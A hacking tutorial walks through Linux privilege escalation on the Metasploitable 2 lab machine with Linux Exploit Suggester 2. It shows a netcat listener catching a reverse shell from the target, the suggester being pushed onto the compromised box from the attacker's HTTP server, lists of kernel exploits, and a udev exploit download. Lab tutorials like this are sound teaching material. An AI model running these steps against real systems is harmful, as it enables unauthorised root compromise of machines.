
Searching for Exploits and Getting Root with Linux Exploit Suggester « Null Byte :: WonderHowTo



Privilege escalation is one of the essential skills a hacker can have, and it often separates newcomers from professionals. With a constantly changing landscape and an abundance of exploits out there, it can be a difficult part of any attack. Fortunately, there are tools that speed up the process, and Linux Exploit Suggester is one of many that can help you become root.

Privilege escalation is gaining the rights of another user on the system. It comes in two flavors: horizontal and vertical privilege escalation.

Horizontal privilege escalation is when an attacker gains access to another user account, usually one with the same status and permissions. It can give them access to additional systems or data, but it is not as serious as its vertical cousin. Vertical privilege escalation is when an attacker gains access to an account with elevated privileges, such as that of a system administrator.

Privilege escalation, especially the vertical kind, is vital for an attacker because it allows them to do things an average user cannot. Unless the system is poorly configured, standard users usually cannot execute malicious code or reconfigure the system in ways that would benefit an attacker. That is why escalating privileges is key to the full compromise of a target.

Step 1: Setup and Initial Compromise

For this walkthrough we use Metasploitable 2 as the target and Kali Linux as our attacking machine; any similar setup will do. First, we need to download Linux Exploit Suggester 2 from GitHub.

Let us assume the target has restricted access to the internet, so we first download the script to our local machine and transfer it to the target later. We can use wget to fetch it directly from the terminal:

  ~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl

--2020-02-18 12:15:58--  https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24780 (24K) [text/plain]
Saving to: 'linux-exploit-suggester-2.pl'

linux-exploit-suggester-2.pl   100%[==========================================>]  24.20K  --.-KB/s    in 0.03s

2020-02-18 12:15:58 (718 KB/s) - 'linux-exploit-suggester-2.pl' saved [24780/24780]

Now we need to compromise the target and get shell access; command injection is always a good option. Once our listener catches the incoming connection, we can verify that we are the user www-data with the id command:

  ~# nc -lvnp 4321

listening on [any] 4321 ...
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

From here we want to upgrade to a fully interactive TTY shell so that we have more control and can use tab completion, command history, and so on. After upgrading the shell, we change to a world-writable directory where we can receive and eventually execute the tool:

  www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shm

Step 2: Transfer the Script to the Target

Let's rename the script on our local computer to something shorter:

  ~# mv linux-exploit-suggester-2.pl les2.pl

Now we can serve the script with Python's SimpleHTTPServer module, using the -m switch to run the module. (SimpleHTTPServer is the Python 2 name; on Python 3 the equivalent is python3 -m http.server.)

  ~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

That serves everything in the current directory over HTTP on port 8000, to anyone who can reach it, so stop the server as soon as the transfer is done.

Back on the target we use wget again, this time to fetch the script from our local machine:

  www-data@metasploitable:/dev/shm$ wget http://10.10.0.1:8000/les2.pl

--13:43:17--  http://10.10.0.1:8000/les2.pl
           => `les2.pl'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,780 (24K) [text/x-perl]

100%[==========================================>] 24,780        --.--K/s

13:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]

Once that completes, we can kill the Python server. Now let's look at the permissions of the script we just transferred:

  www-data@metasploitable:/dev/shm$ ls -la

total 28
drwxrwxrwt  2 root     root        60 Jun 19 13:43 .
drwxr-xr-x 13 root     root     13480 Jun 19 13:28 ..
-rw-r--r--  1 www-data www-data 24780 Feb 18  2020 les2.pl

We can see that the script is readable and writable by its owner but not executable (-rw-r--r--), so use chmod to add the execute bit. (Alternatively, run it through the interpreter with perl les2.pl; that is also the way around a /dev/shm mounted with noexec.)

  www-data@metasploitable:/dev/shm$ chmod +x les2.pl

We are finally ready to execute the script.

Step 3: Run Linux Exploit Suggester

Because we made it executable, we can run Linux Exploit Suggester with the dot-slash. Use the -h flag to view the help menu and usage example:

  www-data@metasploitable:/dev/shm$ ./les2.pl -h

#############################
  Linux Exploit Suggester 2
#############################

  Usage: ./les2.pl [-h] [-k kernel] [-d]

  [-h] Help (this message)
  [-k] Kernel number (eg. 2.6.28)
  [-d] Open exploit download menu

  You can also provide a partial kernel version (eg. 2.4)
  to see all available exploits.

The easiest way to use the tool is to run it with no options; it then reads the kernel version of the machine it is running on:

  www-data@metasploitable:/dev/shm$ ./les2.pl

#############################
  Linux Exploit Suggester 2
#############################

Local Kernel: 2.6.24
Searching 72 exploits...

Possible Exploits
[1] asl
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
   CVE-2016-5195
   Source: http://www.exploit-db.com/exploits/40616
[4] do_pages_move
   Alt: sieve  CVE-2010-0415
   Source: Spenders Enlightenment
[5] exploit_x
   CVE-2018-14665
   Source: http://www.exploit-db.com/exploits/45697
[6] half_nelson1
   Alt: econet  CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson2
   Alt: econet  CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787
[8] half_nelson3
   Alt: econet  CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787
[9] msr
   CVE-2013-0268
   Source: http://www.exploit-db.com/exploits/27297
[10] pipe.c_32bit
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[11] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150
[12] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130
[13] sock_sendpage
   Alt: wunderbar_emporium  CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
[14] sock_sendpage2
   Alt: proto_ops  CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
[15] video4linux
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024
[16] vmsplice1
   Alt: jessica biel  CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5092
[17] vmsplice2
   Alt: diane_lane  CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5093

Linux Exploit Suggester works by grabbing the running kernel version and comparing it against its list of known exploits and the kernel versions each one applies to. Above, it returned a handful of potential exploits for our kernel. Let's confirm the kernel version with the command uname -r:

  www-data@metasploitable:/dev/shm$ uname -r

2.6.24-16-server
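To make that comparison concrete, here is a small Python model of the lookup the tool performs. This is an added example for this article, not the code of Linux Exploit Suggester 2: the matching rule (a full major.minor.patch version must appear in an exploit's version list, while a partial version such as 2.6 matches any listed version under that prefix) is inferred from the output shown here, and the exploit table is a constructed subset whose names and CVEs come from the output above but whose version lists are illustrative only.

```python
"""Minimal model of a kernel-version exploit suggester.

Added example, not the code of Linux Exploit Suggester 2. The exploit
table is a small, constructed subset: names and CVEs are taken from the
tool's output in the article, the version lists are illustrative.
"""
import re


def patch_range(major_minor, lo, hi):
    """Build ('2.6.17', ..., '2.6.24') for a contiguous span of patch levels."""
    return tuple(f"{major_minor}.{p}" for p in range(lo, hi + 1))


# (name, cve, vulnerable kernel versions as major.minor.patch) -- constructed data
EXPLOITS = (
    ("dirty_cow",   "CVE-2016-5195", patch_range("2.6", 22, 39) + ("3.2.0", "4.8.2")),
    ("vmsplice1",   "CVE-2008-0600", patch_range("2.6", 17, 24)),
    ("exit_notify", "N/A",           patch_range("2.6", 25, 29)),
    ("memodipper",  "CVE-2012-0056", ("2.6.39", "3.0.0", "3.1.0")),
    ("krad",        "N/A",           patch_range("2.6", 5, 11)),
)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def normalize_kernel(release):
    """Reduce a `uname -r` string such as '2.6.24-16-server' to '2.6.24'.

    The distribution suffix is dropped because the table is keyed on the
    upstream version only. A partial version like '2.6' is returned as-is.
    """
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return ".".join(p for p in m.groups() if p is not None)


def suggest(kernel, exploits=EXPLOITS):
    """Return [(name, cve, first_matching_version)] for the given kernel.

    A full version must appear in an exploit's list. A partial version
    (e.g. '2.6') matches any listed version under that prefix, which is
    why `-k 2.6` produces a much longer list than the exact kernel does.
    """
    key = normalize_kernel(kernel)
    partial = key.count(".") < 2
    hits = []
    for name, cve, versions in exploits:
        for v in versions:
            # key + "." prevents '2.6' from matching a hypothetical '2.60.x'
            if v == key or (partial and v.startswith(key + ".")):
                hits.append((name, cve, v))
                break  # report the first matching version only
    return hits


if __name__ == "__main__":
    for kernel in ("2.6.24-16-server", "2.6", "3.2.0-4-amd64"):
        print(f"Local Kernel: {kernel}")
        for i, (name, cve, v) in enumerate(suggest(kernel), 1):
            print(f"  [{i}] {name} ({v})  {cve}")
```

Two things the model makes visible: the exact kernel 2.6.24 is matched only by exploits whose list contains that very patch level, while the partial key 2.6 pulls in everything from krad (2.6.5) to memodipper (2.6.39), most of which cannot apply to a 2.6.24 box. And because the lookup sees nothing but the version string, it has no way of knowing whether the distribution has backported a fix, so every hit is a lead to verify, not a confirmed vulnerability.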

Instead of using the exact version number, we can pass a partial version such as 2.6 with the -k flag. The tool then lists every exploit that applies to any 2.6.x kernel, showing the first matching version in parentheses. This casts a wider net, which is useful because systems are often still vulnerable to slightly older exploits, but it also returns exploits for kernels older or newer than ours, so each candidate still has to be checked against the actual target:

  www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6

#############################
  Linux Exploit Suggester 2
#############################

Local Kernel: 2.6
Searching 72 exploits...

Possible Exploits
[1] asl (2.6.0)
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
   CVE-N/A
   Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
   CVE-2016-5195
   Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
   Alt: sieve  CVE-2010-0415
   Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
   Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
   CVE-2018-14665
   Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
   CVE-2008-4210
   Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
   CVE-2006-3626
   Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
   Alt: econet  CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
   Alt: econet  CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
   Alt: econet  CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
   Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
   CVE-2012-0056
   Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
   CVE-2013-0268
   Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
   Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
   Alt: ia32syscall, robert_you_suck  CVE-2010-3301
   Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
   CVE-2006-2451
   Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
   CVE-2014-0196
   Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
   CVE-2010-3904
   Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
   CVE-2008-4113
[37] semtex (2.6.37)
   CVE-2013-2094
   Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
   Alt: wunderbar_emporium  CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
   Alt: proto_ops  CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
   Alt: udev <1.4.1  CVE-2009-1185
   Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
   CVE-2009-2698
   Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6.0)
   CVE-2009-1046
[45] video4linux (2.6.0)
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
   Alt: jessica biel  CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
   Alt: diane_lane  CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5093

We can see that this returned a much larger pool of potential exploits. Linux Exploit Suggester also has an option to download the exploit code straight to the target. Use the -d flag to enable it:

  www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 -d

#############################
  Linux Exploit Suggester 2
#############################

Local Kernel: 2.6
Searching 72 exploits...

Possible Exploits
[1] asl (2.6.0)
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814

[... the same 47 entries as in the previous run ...]

[46] vmsplice1 (2.6.17)
   Alt: jessica biel  CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
   Alt: diane_lane  CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5093

Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download: 

After listing the potential exploits, the tool gives us the option to download all of them or individual ones. For example, to download the udev exploit we simply enter its number from the list, 41:

  Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download: 41

Downloading https://www.exploit-db.com/raw/8478 -> exploit_udev

Note that the download feature fetches the exploit from the target itself, so it needs the target to have an active internet connection; where outbound access is restricted (as we assumed at the start) it will not work, and the exploit has to be transferred the same way as the script. Where it does work, it makes getting the exploit code onto the target very easy. From this point on it is a matter of compiling and running the exploit to become root. Keep in mind that the suggester matches only on the version string: it cannot see distribution backports, so a listed exploit may already be patched, and a kernel exploit that does not fit the target can crash it. Read the exploit source before running it, and check it against the target's kernel version, architecture, and available compiler.

Wrapping Up

In this tutorial we learned about privilege escalation and a tool called Linux Exploit Suggester. We started with an initial compromise and transferred the script to the target. We then ran it and covered some of its options to discover potential exploits that could be used to become root. Privilege escalation is an integral part of every hacker's methodology, and Linux Exploit Suggester is just one tool to help toward that end.

Cover image by Pedro Sandrini / Pexels
